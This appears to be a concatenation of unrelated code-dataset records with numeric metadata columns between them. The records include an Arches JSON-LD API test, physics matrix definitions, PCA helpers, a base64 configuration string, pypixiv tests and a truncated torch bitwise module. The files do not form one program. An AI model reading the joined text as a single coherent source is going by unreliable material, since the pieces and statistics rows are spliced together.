"@type": "http://www.cidoc-crm.org/cidoc-crm/E54_Dimension",
"http://www.cidoc-crm.org/cidoc-crm/P90_has_value": 1
}
}
},
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E12_Production",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "second part",
"http://www.cidoc-crm.org/cidoc-crm/P4_has_time-span": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P83_had_at_least_duration": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E54_Dimension",
"http://www.cidoc-crm.org/cidoc-crm/P90_has_value": 6
}
}
}
]
},
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E12_Production",
"http://www.cidoc-crm.org/cidoc-crm/P10_falls_within": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E12_Production",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "bar",
"http://www.cidoc-crm.org/cidoc-crm/P4_has_time-span": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime",
"@value": "2019-12-07"
},
"http://www.cidoc-crm.org/cidoc-crm/P82b_end_of_the_end": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime",
"@value": "2019-12-08"
}
}
}
}
],
"http://www.cidoc-crm.org/cidoc-crm/P138i_has_representation": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E36_Visual_Item",
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://localhost:8000/concepts/36c8d7a3-32e7-49e4-bd4c-2169a06b240a",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "material a"
}
}
}
"""
with open(os.path.join("tests/fixtures/jsonld_base/models/nest_test.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
url = self._create_url(
graph_id="9b596906-1540-11ea-b353-acde48001122",
resource_id="c3b693cc-1542-11ea-b353-acde48001122",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/c3b693cc-1542-11ea-b353-acde48001122")
# TODO - more asserts to make sure data is saved correctly
def test_g_6235_parenttile(self):
data = """{
"@id": "http://localhost:8000/resources/05f314d0-7a7b-4408-8d9b-f0b61f1fb27d",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P108i_was_produced_by": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E12_Production",
"http://www.cidoc-crm.org/cidoc-crm/P1_is_identified_by": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E41_Appellation",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "a"
},
"http://www.cidoc-crm.org/cidoc-crm/P4_has_time-span": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime", "@value": "2020-07-08"}
},
"http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "b"
}
},
"http://www.cidoc-crm.org/cidoc-crm/P1_is_identified_by": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E41_Appellation",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "test 1"
}
}
"""
url = self._create_url(
graph_id="0bc001c2-c163-11ea-8354-3af9d3b32b71",
resource_id="05f314d0-7a7b-4408-8d9b-f0b61f1fb27d",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
# And validate that all three of E52, E33 and E41 are there
prod = js["http://www.cidoc-crm.org/cidoc-crm/P108i_was_produced_by"]
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P1_is_identified_by" in prod)
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P4_has_time-span" in prod)
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by" in prod)
| 46.970514
| 139
| 0.569627
| 6,702
| 55,754
| 4.612951
| 0.100269
| 0.113339
| 0.085005
| 0.106256
| 0.823198
| 0.795252
| 0.778852
| 0.758442
| 0.74848
| 0.727876
| 0
| 0.097528
| 0.280375
| 55,754
| 1,186
| 140
| 47.010118
| 0.673022
| 0.029236
| 0
| 0.489754
| 0
| 0.11373
| 0.633636
| 0.05977
| 0
| 0
| 0
| 0.000843
| 0.128074
| 1
| 0.026639
| false
| 0.003074
| 0.050205
| 0
| 0.078893
| 0.016393
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
55e843a8b8a1250fd32fce30bd1d930c2732b052
| 2,766
|
py
|
Python
|
l2hmc-qcd/lattice/gauge/matrices.py
|
saforem2/l2hmc-qcd
|
b5fe06243fae663607b6c88e71373b68b19558fc
|
[
"Apache-2.0"
] | 32
|
2019-04-18T18:50:28.000Z
|
2022-03-31T18:30:48.000Z
|
l2hmc-qcd/lattice/gauge/matrices.py
|
saforem2/l2hmc-qcd
|
b5fe06243fae663607b6c88e71373b68b19558fc
|
[
"Apache-2.0"
] | 21
|
2019-09-09T21:10:48.000Z
|
2022-02-26T17:43:51.000Z
|
l2hmc-qcd/lattice/gauge/matrices.py
|
saforem2/l2hmc-qcd
|
b5fe06243fae663607b6c88e71373b68b19558fc
|
[
"Apache-2.0"
] | 4
|
2020-10-31T02:25:04.000Z
|
2021-05-25T00:49:14.000Z
|
import numpy as np
GELLMANN_MATRICES = np.array([
np.matrix([ # lambda_1
[0, 1, 0],
[1, 0, 0],
[0, 0, 0],
], dtype=np.complex),
np.matrix([ # lambda_2
[0, 1j, 0],
[1j, 0, 0],
[0, 0, 0],
], dtype=np.complex),
np.matrix([ # lambda_3
[+1, 0, 0],
[0, -1, 0],
[0, 0, 0],
], dtype=np.complex),
np.matrix([ # lambda_4
[0, 0, 1],
[0, 0, 0],
[1, 0, 0],
], dtype=np.complex),
np.matrix([ # lambda_5
[0, 0, -1j],
[0, 0, 0],
[+1j, 0, 0],
], dtype=np.complex),
np.matrix([ # lambda_6
[0, 0, 0],
[0, 0, 1],
[0, 1, 0],
], dtype=np.complex),
np.matrix([ # lambda_7
[0, 0, 0],
[0, 0, -1j],
[0, 1j, 0],
], dtype=np.complex),
np.matrix([ # lambda_8
[+1, 0, 0],
[0, +1, 0],
[0, 0, -2],
], dtype=np.complex) / np.sqrt(3),
])
PAULI_MATRICES = np.array([
np.matrix([
[0, 1],
[1, 0],
], dtype=np.complex),
np.matrix([
[0, -1j],
[+1j, 0],
], dtype=np.complex),
np.matrix([
[+1, 0],
[0, -1],
], dtype=np.complex),
])
DIRAC_MATRICES = np.array([
np.matrix([
[+1, 0, 0, 0],
[0, +1, 0, 0],
[0, 0, -1, 0],
[0, 0, 0, -1],
], dtype=np.complex),
np.matrix([
[0, 0, 0, +1],
[0, 0, +1, 0],
[0, -1, 0, 0],
[-1, 0, 0, 0],
], dtype=np.complex),
np.matrix([
[0, 0, 0, -1j],
[0, 0, +1j, 0],
[0, +1j, 0, 0],
[-1j, 0, 0, 0],
], dtype=np.complex),
np.matrix([
[0, 0, +1, 0],
[0, 0, 0, -1],
[-1, 0, 0, 0],
[0, +1, 0, 0],
], dtype=np.complex)
])
CHIRAL_DIRAC_MATRICES = np.array([
np.matrix([
[0, 0, +1, 0],
[0, 0, 0, +1],
[+1, 0, 0, 0],
[0, +1, 0, 0],
], dtype=np.complex),
np.matrix([
[0, 0, 0, +1j],
[0, 0, +1j, 0],
[0, -1j, 0, 0],
[-1j, 0, 0, 0],
], dtype=np.complex),
np.matrix([
[0, 0, 0, -1j],
[0, 0, +1j, 0],
[0, +1j, 0, 0],
[-1j, 0, 0, 0],
], dtype=np.complex),
np.matrix([
[0, 0, +1j, 0],
[0, 0, 0, -1j],
[-1j, 0, 0, 0],
[0, 1j, 0, 0],
], dtype=np.complex),
])
GAMMA_5 = np.matrix([
[0, 0, +1, 0],
[0, 0, 0, +1],
[+1, 0, 0, 0],
[0, +1, 0, 0],
], dtype=np.complex)
CHIRAL_GAMMA_5 = np.matrix([
[+1, 0, 0, 0],
[0, +1, 0, 0],
[0, 0, -1, 0],
[0, 0, 0, -1],
], dtype=np.complex)
ETA = np.matrix([
[-1, 0, 0, 0],
[0, +1, 0, 0],
[0, 0, +1, 0],
[0, 0, 0, +1],
], dtype=np.int8)
| 19.478873
| 38
| 0.350325
| 416
| 2,766
| 2.290865
| 0.067308
| 0.253935
| 0.192025
| 0.109129
| 0.909759
| 0.87723
| 0.755509
| 0.637985
| 0.593914
| 0.549843
| 0
| 0.163363
| 0.398048
| 2,766
| 141
| 39
| 19.617021
| 0.409009
| 0.025669
| 0
| 0.80315
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007874
| 0
| 0.007874
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
36327dacb05b912490510d0e51b847bf4f7554c7
| 142
|
py
|
Python
|
controllers/__init__.py
|
rbaylon/ngi
|
97907dd687e15d35449f6cf850b6b37e379114ba
|
[
"BSD-3-Clause"
] | null | null | null |
controllers/__init__.py
|
rbaylon/ngi
|
97907dd687e15d35449f6cf850b6b37e379114ba
|
[
"BSD-3-Clause"
] | null | null | null |
controllers/__init__.py
|
rbaylon/ngi
|
97907dd687e15d35449f6cf850b6b37e379114ba
|
[
"BSD-3-Clause"
] | null | null | null |
from .default_controllers import *
from .person_controllers import *
from .ngi_controllers import *
from .accounting_controllers import *
| 28.4
| 38
| 0.802817
| 16
| 142
| 6.875
| 0.4375
| 0.618182
| 0.572727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140845
| 142
| 4
| 39
| 35.5
| 0.901639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3d1307090707689106710668a615c1edb1432cda
| 524
|
py
|
Python
|
python/testData/inspections/PyUnboundLocalVariableInspection/UnboundNonLocal.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/inspections/PyUnboundLocalVariableInspection/UnboundNonLocal.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/inspections/PyUnboundLocalVariableInspection/UnboundNonLocal.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
def f1():
nonlocal <warning descr="Nonlocal variable 'x' must be bound in an outer function scope">x</warning> #fail
def f2():
def g():
nonlocal <warning descr="Nonlocal variable 'x' must be bound in an outer function scope">x</warning> #fail
print(x)
x = 1
def f3():
nonlocal <warning descr="Nonlocal variable 'x' must be bound in an outer function scope">x</warning> #fail
x = 2
def f4():
x = 0
def g():
nonlocal x #pass
x = 2
return x
return g()
| 20.96
| 114
| 0.601145
| 80
| 524
| 3.9375
| 0.325
| 0.142857
| 0.190476
| 0.266667
| 0.780952
| 0.780952
| 0.780952
| 0.780952
| 0.780952
| 0.780952
| 0
| 0.021333
| 0.284351
| 524
| 24
| 115
| 21.833333
| 0.818667
| 0.030534
| 0
| 0.411765
| 0
| 0
| 0.369048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.058824
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3d3663243c8a1047ff6913e3089750fe679e94fc
| 6,310
|
py
|
Python
|
python_statistics/calculate_pca.py
|
dmccloskey/python_statistics
|
150ca2baedd00281ec5af5aff94fc90b5a1e1e4f
|
[
"MIT"
] | null | null | null |
python_statistics/calculate_pca.py
|
dmccloskey/python_statistics
|
150ca2baedd00281ec5af5aff94fc90b5a1e1e4f
|
[
"MIT"
] | null | null | null |
python_statistics/calculate_pca.py
|
dmccloskey/python_statistics
|
150ca2baedd00281ec5af5aff94fc90b5a1e1e4f
|
[
"MIT"
] | null | null | null |
from .calculate_dependencies import *
from .calculate_base import calculate_base
class calculate_pca(calculate_base):
def calculate_pca(self):
'''calculate PCA
sklearn.decomposition.PCA(n_components=None, copy=True, whiten=False)
from sklearn.datasets import load_iris
iris = load_iris()
X, y = iris.data, iris.target
from sklearn.decomposition import PCA
pca = PCA()
pca.fit(X_blob)
X_pca = pca.transform(X_blob)
plt.scatter(X_pca[:, 0], X_pca[:, 1], c=y, linewidths=0, s=30)
plt.xlabel("first principal component")
plt.ylabel("second principal component")
plt.title("Cumulated Explained Variance")
plt.ylabel("Percentage of explained variance")
plt.xlabel("PCA Components")
plt.plot(np.cumsum(pca_big.explained_variance_ratio_));
'''
pass;
def extract_scoresAndLoadings_2D_v1(self,data_scores,data_loadings,PCs):
'''Extract out the scores and loadings
INPUT:
data_scores = listDict of pca/pls scores
data_loadings = listDict of pca/pls loadings
PCs = [[],[],...] of integers, describing the 2D PC plots
E.G. PCs = [[1,2],[1,3],[2,3]];
OUTPUT:
data_scores_O = {'[1,2]':[],'[1,3]':[],'[2,3]':[],...} where each [] is a listDict of the data from PCs e.g. 1,2
data_loadings_O = {'[1,2]':[],'[1,3]':[],'[2,3]':[],...}
'''
data_scores_O,data_loadings_O = {},{};
for PC_cnt,PC in enumerate(PCs):
#extract out the scores
data_scores_O[str(PC)]=[];
for cnt,d in enumerate(data_scores[PC[0]][:]):
if d['sample_name_short'] != data_scores[PC[1]][cnt]['sample_name_short'] and d['calculated_concentration_units'] != data_scores[PC[1]][cnt]['calculated_concentration_units']:
print('data is not in the correct order');
tmp = copy.copy(d);
tmp['score_' + str(PC[0])] = d['score'];
tmp['var_proportion_'+str(PC[0])] = d['var_proportion'];
tmp['var_cumulative_'+str(PC[0])] = d['var_cumulative'];
#tmp['axislabel'+str(PC[0])] = 'PC' + str(PC[0]) + ' [' + str(round(d['var_proportion']*100,2)) + '%]';
tmp['axislabel'+str(PC[0])] = 'PC' + str(PC[0]);
tmp['score_' + str(PC[1])] = data_scores[PC[1]][cnt]['score'];
#tmp['var_proportion_'+str(PC[1])] = data_scores[PC[1]][cnt]['var_proportion'];
#tmp['var_cumulative_'+str(PC[1])] = data_scores[PC[1]][cnt]['var_cumulative'];
#tmp['axislabel'+str(PC[1])] = 'PC' + str(PC[1]) + ' [' + str(round(data_scores[PC[1]][cnt]['var_proportion']*100,2)) + '%]';
tmp['axislabel'+str(PC[1])] = 'PC' + str(PC[1]);
del tmp['score'];
del tmp['axis'];
del tmp['var_proportion'];
del tmp['var_cumulative'];
data_scores_O[str(PC)].append(tmp);
#extract out the loadings
data_loadings_O[str(PC)]=[];
for cnt,d in enumerate(data_loadings[PC[0]][:]):
if d['component_name'] != data_loadings[PC[1]][cnt]['component_name'] and d['calculated_concentration_units'] != data_loadings[PC[1]][cnt]['calculated_concentration_units']:
print('data is not in the correct order');
tmp = copy.copy(d);
tmp['loadings_' + str(PC[0])] = d['loadings'];
tmp['axislabel'+str(PC[0])] = 'Loadings' + str(PC[0]);
tmp['loadings_' + str(PC[1])] = data_loadings[PC[1]][cnt]['loadings'];
tmp['axislabel'+str(PC[1])] = 'Loadings' + str(PC[1]);
del tmp['loadings'];
del tmp['axis'];
data_loadings_O[str(PC)].append(tmp);
return data_scores_O,data_loadings_O;
def extract_scoresAndLoadings_2D(self,data_scores,data_loadings,PCs):
'''Extract out the scores and loadings
INPUT:
data_scores = listDict of pca/pls scores
data_loadings = listDict of pca/pls loadings
PCs = [[],[],...] of integers, describing the 2D PC plots
E.G. PCs = [[1,2],[1,3],[2,3]];
OUTPUT:
data_scores_O = {'[1,2]':[],'[1,3]':[],'[2,3]':[],...} where each [] is a listDict of the data from PCs e.g. 1,2
data_loadings_O = {'[1,2]':[],'[1,3]':[],'[2,3]':[],...}
'''
data_scores_O,data_loadings_O = {},{};
for PC_cnt,PC in enumerate(PCs):
#extract out the scores
data_scores_O[str(PC)]=[];
for cnt,d in enumerate(data_scores[PC[0]][:]):
if d['sample_name_short'] != data_scores[PC[1]][cnt]['sample_name_short'] and d['calculated_concentration_units'] != data_scores[PC[1]][cnt]['calculated_concentration_units']:
print('data is not in the correct order');
tmp = copy.copy(d);
tmp['score_' + str(PC[0])] = d['score'];
tmp['axislabel'+str(PC[0])] = 'PC' + str(PC[0]);
tmp['score_' + str(PC[1])] = data_scores[PC[1]][cnt]['score'];
tmp['axislabel'+str(PC[1])] = 'PC' + str(PC[1]);
del tmp['score'];
del tmp['axis'];
data_scores_O[str(PC)].append(tmp);
#extract out the loadings
data_loadings_O[str(PC)]=[];
for cnt,d in enumerate(data_loadings[PC[0]][:]):
if d['component_name'] != data_loadings[PC[1]][cnt]['component_name'] and d['calculated_concentration_units'] != data_loadings[PC[1]][cnt]['calculated_concentration_units']:
print('data is not in the correct order');
tmp = copy.copy(d);
tmp['loadings_' + str(PC[0])] = d['loadings'];
tmp['axislabel'+str(PC[0])] = 'Loadings' + str(PC[0]);
tmp['loadings_' + str(PC[1])] = data_loadings[PC[1]][cnt]['loadings'];
tmp['axislabel'+str(PC[1])] = 'Loadings' + str(PC[1]);
del tmp['loadings'];
del tmp['axis'];
data_loadings_O[str(PC)].append(tmp);
return data_scores_O,data_loadings_O;
| 51.300813
| 191
| 0.538193
| 820
| 6,310
| 3.967073
| 0.135366
| 0.061482
| 0.029511
| 0.052259
| 0.79127
| 0.79004
| 0.77344
| 0.750077
| 0.739625
| 0.708269
| 0
| 0.024014
| 0.280666
| 6,310
| 122
| 192
| 51.721311
| 0.692443
| 0.075119
| 0
| 0.830769
| 0
| 0
| 0.204309
| 0.058097
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.015385
| 0.030769
| null | null | 0.061538
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3d461a39ec3b53bbc99bca100ba9c29ed256049c
| 978
|
py
|
Python
|
lib/config/initConfig.py
|
silent-rain/remoteControl
|
d4bc6b1d1a869371c6ddf2f656cbefbd521fab33
|
[
"Apache-2.0"
] | 1
|
2020-06-07T14:28:00.000Z
|
2020-06-07T14:28:00.000Z
|
lib/config/initConfig.py
|
silent-rain/remoteControl
|
d4bc6b1d1a869371c6ddf2f656cbefbd521fab33
|
[
"Apache-2.0"
] | null | null | null |
lib/config/initConfig.py
|
silent-rain/remoteControl
|
d4bc6b1d1a869371c6ddf2f656cbefbd521fab33
|
[
"Apache-2.0"
] | 3
|
2021-04-29T00:36:04.000Z
|
2022-03-10T10:29:22.000Z
|
DATA = "W2RlZmF1bHRdDQoNCg0KDQpbYWRkcmVzc10NCiMg55uR5ZCs5Zyw5Z2ADQppcCA9IDEyNy4wLjAuMQ0KIyDnm5HlkKznq6/lj6MNCnBvcnQgPSA4MDkwDQoNCg0KW3N5c3RlbV0NCiMg6L+b56iL5pWwDQpwcm9jZXNzZXMgPSA0DQoNCg0KW2VmZmVjdF0NCiMg5byA5ZCv5Yqg6L2954m55pWI5piv5ZCm5omT5byADQo7MO+8muWFs+mXrSAx77ya5byA5ZCvDQpsb2FkX2VmZmVjdF9vbiA9IDENCg0KIyDpgI/mmI7luqYNCjswLjAtMS4wDQp0cmFuc3BhcmVudCA9IDAuOA0KDQojIOearuiCpOWIneWni+WMlg0Kc2tpbl9jb2xvciA9ICgxMDcsIDE3MywgMjQ2KQ0KDQpbYXVkaW9dDQojIOWjsOmfs+aYr+WQpuW8gOWQrw0KOzDvvJrlhbPpl60gMe+8muW8gOWQrw0Kc291bmRfb24gPSAxDQoNCg0KW3ZpZXddDQojIOW3peWFt+euseaJqeWxleaYr+WQpuaYvuekug0KOzDvvJog6ZqQ6JePICAx77yaIOaYvuekug0KdG9vbHNfZXh0ZW5zaW9uX3Nob3cgPSAxDQoNCiMg5bel5YW35qCP5piv5ZCm5pi+56S6DQo7MO+8miDpmpDol48gIDHvvJog5pi+56S6DQp0b29sYmFyX3Nob3cgPSAxDQoNCiMg54q25oCB5qCP5piv5ZCm5pi+56S6DQo7MO+8miDpmpDol48gIDHvvJog5pi+56S6DQpzdGF0dXNiYXJfc2hvdyA9IDENCg0KDQpbbG9nZ2luZ10NCiMg5pel5b+X5omT5Y2w57qn5YirDQo7IERFQlVHL0lORk8vV0FSTklORy9FUlJPUi9DUklUSUNBTA0KbG9nZ2luZ19sZXZlbCA9IERFQlVH"
| 489
| 977
| 0.97546
| 20
| 978
| 47.7
| 0.9
| 0.071279
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173333
| 0.003067
| 978
| 1
| 978
| 978
| 0.805128
| 0
| 0
| 0
| 0
| 1
| 0.989775
| 0.989775
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
181730acb2cf8849ce8e526225e6f2dc08c0445a
| 152
|
py
|
Python
|
oscar/lib/python2.7/site-packages/IPython/utils/daemonize.py
|
sainjusajan/django-oscar
|
466e8edc807be689b0a28c9e525c8323cc48b8e1
|
[
"BSD-3-Clause"
] | null | null | null |
oscar/lib/python2.7/site-packages/IPython/utils/daemonize.py
|
sainjusajan/django-oscar
|
466e8edc807be689b0a28c9e525c8323cc48b8e1
|
[
"BSD-3-Clause"
] | null | null | null |
oscar/lib/python2.7/site-packages/IPython/utils/daemonize.py
|
sainjusajan/django-oscar
|
466e8edc807be689b0a28c9e525c8323cc48b8e1
|
[
"BSD-3-Clause"
] | null | null | null |
from warnings import warn
warn("IPython.utils.daemonize has moved to ipyparallel.apps.daemonize")
from ipyparallel.apps.daemonize import daemonize
| 30.4
| 72
| 0.815789
| 20
| 152
| 6.2
| 0.6
| 0.241935
| 0.387097
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118421
| 152
| 4
| 73
| 38
| 0.925373
| 0
| 0
| 0
| 0
| 0
| 0.425676
| 0.331081
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1839f4bc2b36070a1be6575913046e417b10ee8b
| 896
|
py
|
Python
|
tests/test_user.py
|
SaidBySolo/pypixiv
|
b8a99c0ee0f683478e9c25c9f3c6aa78e0e9c0b6
|
[
"MIT"
] | 4
|
2021-02-19T07:07:47.000Z
|
2021-07-30T13:25:29.000Z
|
tests/test_user.py
|
Saebasol/pypixiv
|
b8a99c0ee0f683478e9c25c9f3c6aa78e0e9c0b6
|
[
"MIT"
] | 1
|
2021-07-30T04:52:12.000Z
|
2021-08-01T16:51:42.000Z
|
tests/test_user.py
|
SaidBySolo/pypixiv
|
b8a99c0ee0f683478e9c25c9f3c6aa78e0e9c0b6
|
[
"MIT"
] | 1
|
2021-07-30T15:42:59.000Z
|
2021-07-30T15:42:59.000Z
|
import pytest
from pypixiv.client import PixivClient
from tests.util import filter_magicmethod
@pytest.mark.asyncio
async def test_userinfo(client: PixivClient):
user = await client.userinfo(9666585)
property_names = filter_magicmethod(user)
for i in property_names:
getted = getattr(i["obj"], i["name"])
if not type(getted).__module__ in ["__builtin__", "builtins"]:
if son := filter_magicmethod(getted):
property_names.extend(son)
@pytest.mark.asyncio
async def test_full_userinfo(client: PixivClient):
user = await client.userinfo(9666585)
property_names = filter_magicmethod(user)
for i in property_names:
getted = getattr(i["obj"], i["name"])
if not type(getted).__module__ in ["__builtin__", "builtins"]:
if son := filter_magicmethod(getted):
property_names.extend(son)
| 29.866667
| 70
| 0.680804
| 108
| 896
| 5.37037
| 0.342593
| 0.134483
| 0.058621
| 0.075862
| 0.851724
| 0.851724
| 0.751724
| 0.751724
| 0.751724
| 0.751724
| 0
| 0.019886
| 0.214286
| 896
| 29
| 71
| 30.896552
| 0.803977
| 0
| 0
| 0.761905
| 0
| 0
| 0.058036
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
184b02f9bd3b5201e8602d3b629ae81251a25e16
| 51,458
|
py
|
Python
|
common/torch/bitwise.py
|
davidstutz/random-bit-error-robustness
|
59d8533c8db87ba1b220a64032cf929e5d67fbfa
|
[
"Unlicense"
] | null | null | null |
common/torch/bitwise.py
|
davidstutz/random-bit-error-robustness
|
59d8533c8db87ba1b220a64032cf929e5d67fbfa
|
[
"Unlicense"
] | null | null | null |
common/torch/bitwise.py
|
davidstutz/random-bit-error-robustness
|
59d8533c8db87ba1b220a64032cf929e5d67fbfa
|
[
"Unlicense"
] | null | null | null |
"""
Bitwise tensor manipulation.
"""
import torch
import math
import common.cffi as cffi
import common.cupy as cupy
from .utils import is_cuda, topk
def check_type(*tensors):
def check_precision(tensor):
if tensor.dtype == torch.int32:
return 32
elif tensor.dtype == torch.int16:
return 16
elif tensor.dtype == torch.int8:
return 8
elif tensor.dtype == torch.uint8:
return 8
else:
raise NotImplementedError
precision = None
for tensor in tensors:
assert (tensor.dtype == torch.int32) or (tensor.dtype == torch.int16) or (tensor.dtype == torch.int8) or (tensor.dtype == torch.uint8)
if precision is None:
precision = check_precision(tensor)
else:
assert precision == check_precision(tensor), 'tensor should be %d-bit, but is %d-bit' % (precision, check_precision(tensor))
return precision
def int_bitwise_operation(a, b, name):
"""
Bit-wise operation between float tensors.
:param a: first tensor
:type a: torch.Tensor
:param b: first tensor
:type b: torch.Tensor
:param name: name of cupy kernel
:type name: str
:return: bit-wise and
:rtype: torch.Tensor
"""
#assert (a.is_contiguous() == True)
if not a.is_contiguous():
a = a.contiguous()
if not b.is_contiguous():
b = b.contiguous()
check_type(a, b)
cuda = is_cuda(a)
assert is_cuda(b) is cuda
assert len(a.shape) == len(a.shape), (a.shape, b.shape)
for d in range(len(a.shape)):
assert a.shape[d] == b.shape[d], (a.shape, b.shape, d)
c = a.new_zeros(a.shape)
n = c.nelement()
shape = list(c.shape)
grid, block = cupy.grid_block(shape)
type = str(a.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%s%s' % (type, name))(
grid=tuple(grid),
block=tuple(block),
args=[n,
a.data_ptr(),
b.data_ptr(),
c.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
if name == 'and':
if type == 'int32':
_a = cffi.ffi.cast('int*', a.data_ptr())
_b = cffi.ffi.cast('int*', b.data_ptr())
_c = cffi.ffi.cast('int*', c.data_ptr())
cffi.lib.cffi_int32and(_n, _a, _b, _c)
elif type == 'int16':
_a = cffi.ffi.cast('short*', a.data_ptr())
_b = cffi.ffi.cast('short*', b.data_ptr())
_c = cffi.ffi.cast('short*', c.data_ptr())
